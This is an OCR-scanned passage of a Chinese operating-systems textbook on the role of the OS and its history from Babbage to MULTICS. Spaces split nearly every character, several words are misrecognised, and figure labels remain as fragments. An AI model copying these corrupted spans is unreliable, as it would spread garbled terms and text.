很 难 给 出 操作 系统 的 准确 定义 。 操 作 系 统 是 一 种 运行 在 内 核 态 的 软件 一 一 尽管 这 个 说 法 并 不 总 是 符 
合 事实 。 部 分 原因 是 操作 系统 有 两 个 基本 上 独立 的 任务 ， 即 为 应 用 程序 员 (实际 上 是 应 用 程序 ) 提供 一 
个 资源 集 的 清晰 抽象 ， 并 管理 这 些 硬件 资源 ， 而 不 仅仅 是 一 堆 硬 件 。 另 外 ， 还 取决 于 从 什么 角度 看 待 操 
作 系 统 。 读 者 多 半 听 说 过 其 中 一 个 或 另 一 个 的 功能 。 下 面 我 们 逐 项 进行 讨论 。 


1.1.1 作为 扩展 机 器 的 操作 系统 

在 机 器 语言 一 级 上 , 多 数 计 算 机 的 体系 结构 (指令 集 、 存 储 组 织 、L/O 和 总 线 结构 ) 是 很 原始 的 ， 而 
且 编 程 是 很 困难 的 ， 尤 其 是 对 输入 /输出 操作 而 言 。 为 了 更 细致 地 考察 这 一 点 ， 我 们 以 大 多 数 电脑 使 用 
的 更 现代 的 SATA (Serial ATA) 硬盘 为 例 。 曾 有 一 本 描述 早期 版 本 硬盘 接口 (程序 员 为 了 使 用 硬盘 而 需 
要 了 解 的 东西 ) 的 书 (Anderson，2007) ， 它 的 页 数 超过 450 页 。 自 2007 年 起 ， 接 口 又 被 修改 过 很 多 次 ， 
因而 比 当时 更 加 复杂 。 显 然 ， 没 有 任何 理智 的 程序 员 想 要 在 硬件 层面 上 和 硬盘 打交道 。 相 反 ， 他 们 使 用 
一 些 叫 作 硬 盘 驱动 (disk driver) 的 软件 来 和 硬件 交互 。 这 类 软件 提供 了 读 写 硬盘 块 的 接口 ， 而 不 用 深 
和 细节。 操作 系统 包含 很 多 用 于 控制 输入 /输出 设备 的 驱动 。 

但 就 算是 在 这 个 层面 ， 对 于 大 多 数 应 用 来 说 还 是 太 底层 了 。 因 此 ， 所 有 的 操作 系统 都 提供 使 用 硬 
盘 的 又 一 层 抽象 : 文件 。 使 用 该 抽象 ， 程 序 能 创建 、 读 写 文件 ， 而 不 用 处 理 硬件 实际 工作 中 那些 恼人 
的 细节 。 

抽象 是 管理 复杂 性 的 一 个 关键 。 好 的 抽象 可 以 把 一 个 几乎 不 可 能 管理 的 任务 划分 为 两 个 可 管理 的 部 
分 。 其 第 一 部 分 是 有 关 抽 象 的 定义 和 实现 ， 第 二 部 分 是 随时 用 这 些 抽象 解决 问题 。 几 乎 每 个 计算 机 用 户 
都 理解 的 一 个 抽象 是 文件 ， 正 如 上 文 所 提 到 的 。 文 件 是 一 种 有 效 的 信息 片段 ， 诸 如 数码 照片 、 保 存 的 电 
子 邮件 、 歌 曲 或 Web 页 面 等 。 处 理 数 码 照片 、 电 子 逆 件 : 歌曲 以 及 Web 页 面 等 ， 要 比 处 理 SATA (或 者 其 
他 ) 硬盘 的 细节 容易 ， 这 些 磁盘 的 具体 细节 与 前 面 叙 述 过 的 软盘 一 样 。 操 作 系统 的 任务 是 创建 好 的 抽象 ， 
并 实现 和 管理 它 所 创建 的 抽象 对 象 。 本 书 中 ， 我 们 将 研究 许多 关于 抽象 的 内 容 ， 因 为 这 是 理解 操作 系统 
的 关键 。 

上 述 观 点 是 非常 重要 的 ， 所 以 值得 用 不 同 的 表达 方式 来 再 次 叙述 。 即 使 怀 着 如 此 小 心 翼 翼 对 设计 
Macintosh 机 器 的 工业 设计 师 的 尊重 ， 还 是 不 得 不 说 ， 硬 件 是 丑陋 的 。 真 实 的 处 理 器 、 内 存 条 、 磁 盘 和 其 
他 装置 都 是 非常 复杂 的 ， 对 于 那些 为 使 用 某 个 硬件 而 不 得 不 编写 软件 的 人 们 而 言 ， 他 们 使 用 的 是 困难 、 
可 怕 、 特 殊 和 不 一 致 的 接口 。 有 时 这 是 由 于 需要 兼容 旧 的 硬件 ， 有 时 是 为 了 节省 成 本 ， 但 是 ， 有 时 硬件 
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设计 师 们 并 没有 意识 到 (或 在 意 ) 他 们 给 软件 设计 带 来 了 多 大 的 麻烦 。 操 作 系 统 的 一 个 主要 任务 是 隐藏 
硬件 ， 呈 现 给 程序 (以 及 程序 员 ) 良好 、 清 晰 、 优 雅 、 一 致 的 抽象 。 如 图 1-2 所 示 ， 操 作 系 统 将 丑陋 转变 
为 美丽 。 

需要 指出 的 是 ， 操 作 系 统 的 实际 客户 是 应 用 程 
序 (当然 是 通过 应 用 程序 员 )。 它 们 直接 与 操作 系 
统 及 其 抽象 打交道 。 相 反 ， 最 终 用 户 与 用 户 接口 所 
提供 的 抽象 打交道 ， 或 者 是 命令 行 shell 或 者 是 图 形 
接口 。 而 用 户 接口 的 抽象 可 以 与 操作 系统 提供 的 抽 
象 类 似 ， 但 也 不 总 是 这 样 。 为 了 更 清晰 地 说 明 这 一 
点 ， 请 读者 考虑 普通 的 Windows 桌 面 以 及 面向 行 的 
命令 提示 符 。 两 者 都 是 运行 在 Windows 操 作 系 统 上 
的 程序 ， 并 使 用 了 Windows 提 供 的 抽象 ， 但 是 它们 
提供 了 非常 不 同 的 用 户 接口 。 类 似 地 ， 运 行 Gnome 
或 者 KDE 的 Linux 用 户 与 直接 在 X Window 系 统 ( 面 。 图 1-2 操作 系统 将 丑陋 的 硬件 转变 为 美丽 的 抽象 
向 文本 ) 顶部 工作 的 Linux 用 户 看 到 的 是 非常 不 同 
的 界面 ， 但 是 在 这 两 种 情形 中 ， 操 作 系统 下 面 的 抽象 是 相同 的 。 

在 本 书 中 ， 我 们 将 具体 讨论 提供 给 应 用 程序 的 抽象 ， 不 过 很 少 涉及 用 户 界面 。 尽 管用 户 界面 是 一 个 
巨大 和 重要 的 课题 ， 但 是 它们 毕竟 只 和 操作 系统 的 外 围 相 关 。 


1.1.2 作为 资源 管理 者 的 操作 系统 

把 操作 系统 看 作 向 应 用 程序 提供 基本 抽象 的 概念 ， 是 一 种 自 顶 向 下 的 观点 。 按 照 另 一 种 自 底 向 上 的 
观点 ， 操 作 系统 则 用 来 管理 一 个 复杂 系统 的 各 个 部 分 。 现 代 计 算 机 包含 处 理 器 、 存 储 器 、 时 钟 、 磁 盘 、 
鼠标 、 网 络 接口 、 打 印 机 以 及 许多 其 他 设备 。 从 这 个 角度 看 ， 操 作 系统 的 任务 是 在 相互 竞争 的 程序 之 间 
有 序 地 控制 对 处 理 器 、 存 储 器 以 及 其 他 IO 接口 设备 的 分 配 。 

现代 操作 系统 允许 同时 在 内 存 中 运行 多 道 程序 。 假 设 在 一 台 计 算 机 上 运行 的 三 个 程序 试图 同时 在 同 
一 台 打 印 机 上 输出 计算 结果 ， 那 么 开始 的 几 行 可 能 是 程序 1 的 输出 ， 接 着 几 行 是 程序 2 的 输出 ， 然 后 又 是 
程序 3 的 输出 等 ， 最 终结 果 将 是 一 团 精 。 采 用 将 打印 结果 送 到 磁盘 上 缓冲 区 的 方法 ， 操 作 系统 可 以 把 潜 
在 的 混乱 有 序 化 。 在 一 个 程序 结束 后 ， 操 作 系 统 可 以 将 暂 存在 磁盘 上 的 文件 送 到 打印 机 输出 ， 同 时 其 他 
程序 可 以 继续 产生 更 多 的 输出 结果 ， 很 明显 ， 这 些 程序 的 输出 还 没有 真正 送 至 打印 机 。 

当 一 个 计算 机 (或 网 络 ) 有 多 个 用 户 时 ， 管 理 和 保护 存储 器 、I/O 设 备 以 及 其 他 资源 的 需求 变 得 强 
烈 起 来 ,因为 用 户 间 可 能 会 互相 和 干扰。 另外, 用 户 通常 不 仅 共享 硬件 ， 还 要 共享 信息 (文件 、 数 据 库 等 ) 。 
简 而 言 之 ， 操 作 系 统 的 这 种 观点 认为 ， 操 作 系 统 的 主要 任务 是 记录 哪个 程序 在 使 用 什么 资源 ， 对 资源 请 
求 进行 分 配 ， 评 估 使 用 代价 ， 并 且 为 不 同 的 程序 和 用 户 调解 互相 冲突 的 资源 请 求 。 

资源 管理 包括 用 以 下 两 种 不 同方 式 实现 多 路 复 用 (共享 ) 资源 : 在 时 间 上 复 用 和 在 空间 上 复 用 。 当 
一 种 资源 在 时 间 上 复 用 时 ， 不 同 的 程序 或 用 户 轮流 使 用 它 。 先 是 第 一 个 获得 资源 的 使 用 ， 然 后 下 一 个 ， 
以 此 类 推 。 例 如 ， 若 在 系统 中 只 有 一 个 CPU ， 而 多 个 程序 需要 在 该 CPU 上 运行 ， 操 作 系统 则 首先 把 该 
CPU 分 配给 某 个 程序 ， 在 它 运行 了 足够 长 的 时 间 之 后 ， 另 一 个 程序 得 到 CPU ， 然 后 是 下 一 个 ， 如 此 进行 
下 去 ， 最 终 ， 轮 到 第 一 个 程序 再 次 运行 。 至 于 资源 是 如 何 实现 时 间 复 用 的 一 一 谁 应 该 是 下 一 个 以 及 运行 
多 长 时 间 等 一 一 则 是 操作 系统 的 任务 。 还 有 一 个 有 关 时 间 复 用 的 例子 是 打印 机 的 共享 。 当 多 个 打印 作业 
在 一 台 打 印 机 上 排队 等 待 打印 时 ， 必 须 决定 将 轮 到 打印 的 是 哪个 作业 。 

另 一 类 复 用 是 空间 复 用 。 每 个 客户 都 得 到 资源 的 一 部 分 ， 从 而 取代 了 客户 排队 。 例 如 ， 通 常 在 若干 
运行 程序 之 间 分 割 内 存 ， 这 样 每 一 个 运行 程序 都 可 同时 人 驻 内 存 (例如 ， 为 了 轮流 使 用 CPU)。 假 设 有 
足够 的 内 存 可 以 存放 多 个 程序 ， 那 么 在 内 存 中 同时 存放 若干 个 程序 的 效率 ， 比 把 所 有 内 存 都 分 给 一 个 程 
序 的 效率 要 高 得 多 ， 特 别 是 ， 如 果 一 个 程序 只 需要 整个 内 存 的 一 小 部 分 ， 结 果 更 是 这 样 。 当 然 ， 如 此 的 
做 法 会 引起 公平 、 保 护 等 问题 ,这 有 赖 于 操作 系统 解决 它们 。 有 关 空 间 复 用 的 其 他 资源 还 有 磁盘 。 在 许 
多 系统 中 ， 一 个 磁盘 同时 为 许多 用 户 保存 文件 。 分 配 磁盘 空间 并 记录 谁 正在 使 用 哪个 磁盘 块 ， 是 操作 系 
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统 的 典型 任务 。 


1.2 操作 系统 的 历史 


操作 系统 已 经 存在 许多 年 了 。 在 下 面 的 小 节 中 , 我 们 将 简要 地 考察 操作 系统 历史 上 的 一 些 重要 之 处 。 
操作 系统 与 其 所 运行 的 计算 机 体系 结构 的 联系 非常 密切 。 我 们 将 分 析 连 续 几 代 的 计算 机 ， 看 看 它们 的 操 
作 系 统 是 什么 样 的 。 把 操作 系统 的 分 代 映 射 到 计算 机 的 分 代 上 有 些 粗糙 ， 但 是 这 样 做 确实 有 某 些 作用 ， 
否则 没有 其 他 好 办 法 能 够 说 清楚 操作 系统 的 历史 。 

下 面 给 出 的 有 关 操 作 系 统 的 发 展 主要 是 按照 时 间 线 索 叙 述 的 ， 且 在 时 间 上 是 有 重 释 的 。 每 个 发 展 并 
不 是 等 到 先前 一 种 发 展 完成 后 才 开 始 。 存 在 着 大 量 的 重 倒 ， 更 不 用 说 还 存在 有 不 少 虚假 的 开始 和 终结 时 
间 。 请 读者 把 这 里 的 文字 叙述 看 成 是 一 种 指引 ， 而 不 是 盖 棺 定论 。 

第 一 台 真 正 的 数字 计算 机 是 英国 数学 家 Charles Babbage (1792—1871) 设计 的 。 尽 管 Babbage 花 费 
了 他 几乎 一 生 的 时 间 和 财产 ， 试 图 建造 他 的 “分 析 机 ”， 但 是 他 始终 未 能 让 机 器 正常 运转 ， 因 为 它 是 一 
台 纯 机 械 的 数字 计算 机 ， 他 所 在 时 代 的 技术 不 能 生产 出 他 所 需要 的 高 精度 轮子 、 齿 轮 和 轮 牙 。 毫 无 疑问 ， 
这 台 分 析 机 没有 操作 系统 。 

有 一 段 有 趣 的 历史 花絮 ，Babbage 认 识 到 他 的 分 析 机 需要 软件 ， 所 以 他 雇佣 了 一 个 名 为 Ada 
Lovelace 的 年 轻 妇女 ， 这 是 世界 上 第 一 个 程序 员 ， 而 她 是 著名 的 英国 诗人 Lord Byron 的 女儿 。 程 序 设计 
语言 Ada 是 以 她 命名 的 。 


1.2.1 第 一 代 (1945~1955): 真空 管 和 穿孔 卡片 

从 Babbage 失败 之 后 一 直到 第 二 次 世界 大 战 ， 数 字 计 算 机 的 建造 几乎 没有 什么 进展 ， 第 二 次 世界 大 
战 刺 激 了 有 关 计 算 机 研究 工作 的 爆炸 性 开展 。 艾 奥 瓦 州立 大 学 的 John Atanasoff 教 授 和 他 的 学 生 Clifford 
Berry 建 造 了 被 认为 是 第 一 台 可 工作 的 数字 计算 机 。 该 机 器 使 用 了 300 个 真空 管 。 大 约 在 同时 ，Konrad 
Zuse 在 柏林 用 继电器 构建 了 Z3 计 算 机 。1944 年 ， 一 群 科学 家 (包括 Alan Turing) 在 英格兰 布 莱 切 利 庄园 
构建 了 Colossus 并 为 其 编程 ，Howard Aiken 在 哈佛 大 学 建造 了 Mark 1， 宾夕法尼亚 大 学 的 William 
Mauchley 和 他 的 学 生 J. Presper Eckert 建 造 了 ENIAC。 这 些 机 器 有 的 是 二 进 制 的 ， 有 的 使 用 真空 管 ， 有 的 
是 可 编程 的 ， 但 是 都 非常 原始 ， 甚 至 需要 花费 数秒 时 间 才 能 完成 最 简单 的 运算 。 

在 那个 年 代 里 ， 同 一 个 小 组 的 人 (通常 是 工程 师 们 ) 设计 、 建 造 、 编 程 、 操 作 并 维护 一 台 机 器 。 所 
有 的 程序 设计 是 用 纯粹 的 机 器 语言 编写 的 ， 甚 至 更 粳 糕 ， 需 要 通过 将 上 千 根 电 缆 接 到 插件 板 上 连接 成 电 
路 ， 以 便 控 制 机 器 的 基本 功能 。 没 有 程序 设计 语言 (甚至 汇编 语言 也 没有 ) ， 操 作 系 统 则 从 来 没有 听 说 
过 。 使 用 机 器 的 一 般 方式 是 ， 程 序 员 在 墙 上 的 机 时 表 上 预约 一 段 时 间 ， 然 后 到 机 房 中 将 他 的 插件 板 接 到 
计算 机 里 ， 在 接 下 来 的 几 小 时 里 ， 期 盼 正在 运行 中 的 两 万 多 个 真空 管 不 会 烧 坏 。 那 时 ， 所 有 的 计算 问题 
实际 上 都 只 是 简单 的 数学 运算 ， 如 制作 正弦 、 人 余弦、 对 数 表 或 者 计算 炮弹 弹道 等 。 

到 了 20 世 纪 50 年 代 初 有 了 改进 ， 出 现 了 穿孔 卡片 ， 这 时 就 可 以 将 程序 写 在 卡片 上 ， 然 后 读 入 计算 机 
而 不 用 播 件 板 ， 但 其 他 过 程 则 依然 如 旧 。 


1.2.2 第 二 代 (1955~ 1965) :晶体管 和 批 处 理 系统 

.20 世 纪 50 年 代 晶 体 管 的 发 明 极 大 地 改变 了 整个 状况 。 计 算 机 已 经 很 可 靠 ， 厂 商 可 以 成 批 地 生产 并 销 
售 计算 机 给 用 户 ， 用 户 可 以 指望 计算 机 长 时 间 运 行 ， 完 成 一 些 有 用 的 工作 。 此 时 ， 设 计 人 员 、 生 产 人 员 、 
操作 人 员 、 程 序 人 员 和 维护 人 员 之 间 第 一 次 有 了 明确 的 分 工 。 | 

这 些 机 器 ， 现 在 被 称 作 大 型 机 (mainframe)， 锁 在 有 专用 空调 的 大 房间 中 ， 由 专业 操作 人 员 运 行 。 
只 有 少数 大 公司 、 重 要 的 政府 部 门 或 大 学 才 接 受 数 百 万 美元 的 标价 。 要 运行 一 个 作业 (job， 即 一 个 或 
一 组 程序 ) ， 程 序 员 首先 将 程序 写 在 纸 上 (用 FORTRAN 语 言 或 汇编 语言 )， 然 后 穿孔 成 卡片 ， 再 将 卡片 
盒 带 到 输入 室 ， 交 给 操作 员 ， 接 着 就 喝 咖 啡 直到 输出 完成 。 

计算 机 运行 完 当 前 的 任务 后 ， 基 计算 结果 从 打印 机 上 输出 ， 操 作 员 到 打印 机 上 撕 下 运算 结果 并 送 到 
输出 室 ， 程 序 员 稍 后 就 可 取 到 结果 。 然 后 ， 操 作 员 从 已 送 到 输入 室 的 卡片 盒 中 读 入 另 一 个 任务 。 如 果 需 
要 FORTRAN 编 译 器 ， 操 作 员 还 要 从 文件 柜 把 它 取 来 读 和 人 计算 机 。 当 操作 员 在 机 房 里 走 来 走 去 时 许多 机 
时 被 浪费 掉 了 。 
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由 于 当时 的 计算 机 非常 昂贵 ， 人 们 很 自然 地 要 想 办 法 减少 机 时 的 浪费 。 通 常 采用 的 解决 方法 就 是 批 
处 理 系 统 (batch system) 。 其 思想 是 : 在 输入 室 收集 全 部 的 作业 ， 然 后 用 一 台 相 对 便宜 的 计算 机 如 IBM 
1401 计 算 机 将 它们 读 到 磁带 上 。IBM 1401 计 算 机 适用 于 读 卡片 、 复 制 磁带 和 输出 打印 ， 但 不 适用 于 数值 
运算 。 另 外 用 较 昂 贵 的 计算 机 如 IBM 7094 来 完成 真正 的 计算 。 这 些 情 况 如 图 1-3 所 示 。 


输入 输出 






P 打印 机 
M Wor) 


AM 
1401 





a) b) c) d) e) f) 


图 1-3 一 种 早期 的 批 处 理 系统 : a) 程序 员 将 卡片 拿 到 1401 机 处 ，b) 1401 机 将 批 处 理 作业 读 到 磁带 上 ， 
c) 操作 员 将 输入 带 送 至 7094 机 ，d) 7094 机 进行 计算 ，e) 操作 员 将 输出 磁带 送 到 1401 机 ，D 1401 机 打 
印 输出 


在 收集 了 大 约 一 个 小 时 的 批量 作业 之 后 ， 这 些 卡片 被 读 进 磁 带 ， 然 后 磁带 被 送 到 机 房 里 并 装 到 磁带 
机 上 。 随 后 ， 操 作 员 装 入 一 个 特殊 的 程序 (现代 操作 系统 的 前 身 )， 它 从 磁带 上 读 入 第 一 个 作业 并 运行 ， 
其 输出 写 到 第 二 盘 磁 带 上 ， 而 不 打印 。 每 个 作业 结束 后 ， 操 作 系 统 自动 地 从 磁带 上 读 入 下 一 个 作业 并 运 
行 。 当 一 批 作业 完全 结束 后 ， 操 作 员 取 下 输入 和 输出 磁带 ， 将 输入 磁带 换 成 下 一 批 作 业 ， 并 把 输出 磁带 
拿 到 一 台 1401 机 器 上 进行 脱 机 (不 与 主 计算 机 联机 ) 打印 。 

典型 的 输入 作业 结构 如 图 1-4 所 示 。 一 开始 是 $JOB 卡 片 ， 它 标识 出 所 需 的 最 大 运行 时 间 (以 分 钟 为 
单位 ) 、 计 费 账 号 以 及 程序 员 的 名 字 。 接 着 是 $FORTRAN 卡 片 ， 通 知 操作 系统 从 系统 磁带 上 装 人 
FORTRAN 语 言 编译 器 。 之 后 就 是 待 编译 的 源 程序 ， 然 后 是 $SLOAD 卡 片 ， 通 知 操作 系统 装 和 人 编译 好 的 目 
标 程序 。 接 着 是 SRUN 卡 片 ， 告 诉 操作 系统 运行 该 程序 并 使 用 随后 的 数据 。 最 后 ，$ENPD 卡 片 标识 作业 结 
束 。 这 些 基本 的 控制 卡片 是 现代 shell 和 命令 解释 器 的 先驱 。 











图 1-4 典型 的 FMS 作 业 结构 


第 二 代 大 型 计算 机 主要 用 于 科学 与 工程 计算 ， 例 如 ， 解 偏 微分 方程 。 这 些 题目 大 多 用 FORTRAN 语 
言 和 汇编 语言 编写 。 典 型 的 操作 系统 是 FMS (FORTRAN Monitor System, FORTRAN K AS) 和 
IBSYS (IBM 为 7094 机 配备 的 操作 系统 ) 。 j l 
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1.23 第 三 代 (1965~ 1980) :集成 电路 和 多 道 程 序 设计 

20 世 纪 60 年 代 初 ， 大 多 数 计算 机 厂商 都 有 两 条 不 同 并 且 完 全 不 兼容 的 生产 线 。 一 条 是 面向 字 的 大 型 
科学 用 计算 机 , 诸如 IBM 7094, 主要 用 于 工业 强度 的 科学 和 工程 计算 。 另 一 条 是 面向 字符 的 商用 计算 机 ， 
诸如 IBM 1401， 银 行 和 保险 公司 主要 用 它 从 事 磁带 归档 和 打印 服务 。 

开发 和 维护 两 种 完全 不 同 的 产品 ， 对 厂商 来 说 是 昂贵 的 。 另 外 ， 许 多 新 的 计算 机 用 户 一 开始 时 只 需 
要 一 台 小 计算 机 ， 后 来 可 能 又 需要 一 台 较 大 的 计算 机 ， 而 且 希 望 能 够 更 快 地 执行 原 有 的 程序 。 

IBM 公 司 试图 通过 引入 System/360 来 一 次 性 地 解决 这 两 个 问题 。360 是 一 个 软件 兼容 的 计算 机 系列 ， 
其 低档 机 与 1401 相 当 ， 高 档 机 则 比 7094 功 能 强 很 多 。 这 些 计算 机 只 在 价格 和 性 能 (最 大 存储 器 容量 、 处 
理 器 速度 、 人 允许 的 MO 设备 数量 等 ) 上 有 差异 。 由 于 所 有 的 计算 机 都 有 相同 的 体系 结构 和 指令 集 ， 因 此 ， 
在 理论 上 ， 为 一 种 型 号 机 器 编写 的 程序 可 以 在 其 他 所 有 型 号 的 机 器 上 运行 。( 但 就 像 传言 Yogi Berra 曾 说 
过 的 那样 :“ 在 理论 上 ， 理 论 和 实际 是 一 致 的 ， 而 实际 上 ， 它 们 并 不 是 。”) 既然 360 被 设计 成 既 可 用 于 科 
学 计算 ， 又 可 用 于 商业 计算 ， 那么 一 个 系列 的 计算 机 便 可 以 满足 所 有 用 户 的 要 求 。 在 随后 的 几 年 里 ， 
IBM 使 用 更 现代 的 技术 陆续 推出 了 360 的 后 续 机 型 ， 如 著名 的 370、4300、3080 和 3090 系 列 。zSeries 是 这 
个 系列 的 最 新 机 型 ， 不 过 它 与 早期 的 机 型 相 比 变化 非常 之 大 。 

360 是 第 一 个 采用 (小 规模 ) 集成 电路 (OC) 的 主流 机 型 ， 与 采用 分 立 晶 体 管制 造 的 第 二 代 计 算 机 
相 比 ， 其 性 能 /价格 比 有 很 大 提高 。360 很 快 就 获得 了 成 功 ， 其 他 主要 厂商 也 很 快 采纳 了 系列 兼容 机 的 思 
想 。 这 些 计算 机 的 后 代 仍 在 大 型 的 计算 中 心里 使 用 。 现 在 ， 这 些 计算 机 的 后 代 经 常用 来 管理 大 型 数据 库 
(如 航班 订 票 系统 ) 或 作为 Web 站 点 的 服务 器 ， 这 些 服 务 器 每 秒 必须 处 理 数 千 次 的 请 求 。 

“单一 家 族 ” 思 想 的 最 大 优点 同时 也 是 其 最 大 的 缺点 。 原 因 在 于 所 有 的 软件 (包括 操作 系统 OS/360) 
原本 都 打算 能 够 在 所 有 机 器 上 运行 。 从 小 的 代替 1401 把 卡片 复制 到 磁带 上 的 机 器 ， 到 用 于 代替 7094 进 行 
气象 预报 及 其 他 繁重 计算 的 大 型 机 ， 从 只 能 带 很 少 外 部 设备 的 机 器 到 有 很 多 外 设 的 机 器 ， 从 商业 领域 到 
科学 计算 领域 等 。 总 之 ， 它 要 有 效 地 适用 于 所 有 这 些 不 同 的 用 途 。 

IBM 无 法 写 出 同时 满足 这 些 相互 冲 突 需要 的 软件 (其 他 公司 也 不 行 )。 其 结果 是 一 个 庞大 的 又 极其 
复杂 的 操作 系统 ， 它 比 FMS 大 了 约 2~ 3 个 数量 级 规模 。 其 中 包含 数 千 名 程序 员 写 的 数 百 万 行 汇编 语言 
码 ， 也 包含 成 千 上 万 处 错误 ， 这 就 导致 LIBM 不 断 地 发 行 新 的 版 本 试图 更 正 这 些 错 误 。 每 个 新 版 本 在 修正 
老 错 误 的 同时 又 引入 了 新 错误 ， 所 以 随 着 时 间 的 流逝 ， 错 误 的 数量 可 能 大 致 保持 不 变 。 

OS/360 的 设计 者 之 一 Fred Brooks 后 来 写 过 一 本 既 该 谐 又 尖锐 的 书 (Brooks, 1995), ， 描 述 他 在 开发 
OS/360 过 程 中 的 经 验 。 我 们 不 可 能 在 这 里 复述 该 书 的 全 部 内 容 ， 不 过 其 封面 已 经 充分 表达 了 Fred Brooks 
的 观点 一 一 一 群 史前 动物 陷入 泥潭 而 不 能 自拔 。Silberschatz 等 人 (2012) 的 封面 也 表达 了 操作 系统 如 同 
恐龙 一 般 的 类 似 观 点 。 

抛 开 0S/360 的 庞大 和 存在 的 问题 ，0S/360 和 其 他 公司 类 似 的 第 三 代 操 作 系统 的 确 合理 地 满足 了 大 
多 数 用 户 的 要 求 。 同 时 ， 它 们 也 使 第 二 代 操 作 系统 所 缺乏 的 几 项 关键 技术 得 到 了 广泛 应 用 。 其 中 最 重要 
的 应 该 是 多 道 程序 设计 (mnultiprogramming) 。 在 7094 机 上 ， 若 当前 作业 
因 等 待 磁带 或 其 他 IO 操作 而 暂停 , CPU 就 只 能 简单 地 踏步 直至 该 IO 完成 。 
对 于 CPU 操作 密集 的 科学 计算 问题 ，IO 操 作 较 少 ， 因 此 浪费 的 时 间 很 少 。 
然而 ， 对 于 商业 数据 处 理 ，L/O 操 作 等 待 的 时 间 通 常 占 到 80% ~ 90% ， 所 以 
必须 采取 某 种 措施 减少 (昂贵 的 ) CPU 空闲 时 间 的 浪费 。 

解决 方案 是 将 内 存 分 几 个 部 分 ， 每 一 部 分 存放 不 同 的 作业 ， 如 图 1-5 
所 示 。 当 一 个 作业 等 待 IO 操作 完成 时 ， 另 一 个 作业 可 以 使 用 CPU。 如 果 
内 存 中 可 以 同时 存放 足够 多 的 作业 ， 则 CPU 利用 率 可 以 接近 100% 。 在 内 了 
存 中 同时 驻 留 多 个 作业 需要 特殊 的 硬件 来 对 其 进行 保护 ， 以 避免 作业 的 信 E 一 个 内 存 中 有 三 个 作 
息 被 窃取 或 受到 攻击 。360 及 其 他 第 三 代 计 算 机 都 配 有 此 类 硬件 。 业 的 多 道 程序 系统 

第 三 代 计算 机 的 另 一 个 特性 是 ， 卡 片 被 拿 到 机 房 后 能 够 很 快 地 将 作业 从 卡片 读 入 磁盘 。 于 是 ， 任 何 
时 刻 当 一 个 作业 运行 结束 时 ， 操 作 系统 就 能 将 一 个 新 作业 从 磁盘 读 出 ， 装 进 空 出 来 的 内 存 区 域 运行 。 这 
种 技术 叫 作 同时 的 外 部 设备 联机 操作 (Simultaneous Peripheral Operation On Line，SPOOLing ) ， 该 技 
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术 同 时 也 用 于 输出 。 当 采用 了 SPOOLing 技 术 后 ， 就 不 再 需要 IBM 1401 机 ， 也 不 必 再 将 磁带 搬 来 搬 去 了 。. 

第 三 代 操 作 系 统 很 适用 于 大 型 科学 计算 和 繁忙 的 商务 数据 处 理 ， 但 其 实质 上 仍旧 是 批 处 理 系统 。 许 
多 程序 员 很 怀念 第 一 代 计算 机 的 使 用 方式 ， 那 时 他 们 可 以 几 个 小 时 地 独占 一 台 机 器 ， 可 以 即时 地 调试 他 
们 的 程序 。 而 对 第 三 代 计 算 机 而 言 ， 从 一 个 作业 提交 到 运算 结果 取 回 往往 长 达 数 小 时 ， 更 有 其 者 ， 一 个 
去 号 的 误 用 就 会 导致 编译 失败 ， 而 可 能 浪费 了 程序 员 半 天 的 时 间 ， 程 序 员 并 不 喜欢 这 样 。 

程序 员 的 希望 很 快 得 到 了 响应 ， 这 种 需求 导致 了 分 时 系统 (timesharing) 的 出 现 。 它 实际 上 是 多 道 
程序 的 一 个 变 体 ， 每 个 用 户 都 有 一 个 联机 终端 。 在 分 时 系统 中 ,假设 有 20 个 用 户 登 录 ， 其 中 17 个 在 思考 、 
谈论 或 喝 咖 啡 ， 则 CPU 可 分 配给 其 他 三 个 需要 的 作业 轮流 执行 。 由 于 调试 程序 的 用 户 常常 只 发 出 简短 的 
命令 (如 编译 一 个 五 页 的 源 文件 ) ， 而 很 少 有 长 的 费时 命令 (如 上 百 万 条 记录 的 文件 排序 ) ， 所 以 计算 机 
能 够 为 许多 用 户 提供 快速 的 交互 式 服务 ， 同 时 在 CPU 空闲 时 还 可 能 在 后 台 运 行 一 个 大 作业 。 第 一 个 通用 
的 分 时 系统 一 一 兼容 分 时 系统 (Compatible Time Sharing System, CTSS), 是 MIT( 麻 省 理工 学 院 ) 在 
一 台 改 装 过 的 7094 机 上 开发 成 功 的 (Corbat6 等 人 ，1962)。 但 直到 第 三 代 计算 机 广泛 采用 了 必需 的 保护 
硬件 之 后 ， 分 时 系统 才 逐 渐 流行 开 来 。 

在 CTSS 成 功 研制 之 后 ，MIT、 贝 尔 实验 室 和 通用 电气 公司 (GE， 当 时 一 个 主要 的 计算 机 制造 厂商 ) 
决定 开发 一 种 “公用 计算 服务 系统 ”， 即 能 够 同时 支持 数 百 名 分 时 用 户 的 一 种 机 器 。 它 的 模型 借鉴 了 供 
电 系 统一 一 当 需 要 电能 时 ， 只 需 将 电气 设备 接 到 墙 上 的 插座 即 可 ， 于 是 ， 在 合理 范围 内 ， 所 需要 的 电能 
随时 可 提供 。 该 系统 称 作 MULTICS (MULTiplexed Information and Computing Service ) ， 其 设计 者 着 
眼 于 建造 满足 波士顿 地 区 所 有 用 户 计算 需求 的 一 台 机 器 。 在 当时 看 来 ， 仅 仅 40 年 之 后 ， 就 能 成 百 万 台地 
销售 (价值 不 到 1000 美 元 ) 速度 是 GE-645 主 机 10 000 倍 的 计算 机 ， 完 全 是 科学 幻想 。 这 种 想法 同 现在 关 
于 穿越 大 西洋 的 超 音速 海底 列车 的 想法 一 样 ， 是 幻想 。 

MULTICS 是 一 种 混合 式 的 成 功 。 尽 管 这 台 机 器 具有 较 强 的 I/O 能 力 ， 却 要 在 一 台 仅 仅 比 Intel 386 PC 
性 能 强 一 点 的 机 器 上 支持 数 百 个 用 户 。 可 是 这 个 想法 并 不 像 表面 上 那么 荒唐 ， 因 为 那 时 的 人 们 已 经 知道 
如 何 编写 精练 的 高 效 程序 ， 虽 然 这 种 技巧 随后 逐渐 丢失 了 。 有 许多 原因 造成 MULTICS 没 有 能 够 普及 到 
全 世界 ， 至 少 它 不 应 该 采用 PL/1 编 程 语 言 编 写 ， 因 为 PL/1 编 译 器 推迟 了 好 几 年 才 完 成 ， 好 不 容易 完成 的 
编译 器 又 极 少 能 够 成 功 运行 。 另 外 ， 当 时 的 MULTICS 有 太 大 的 野心 ， 犹 如 19 世 纪 中 期 Charles Babbage 
的 分 析 机 。 

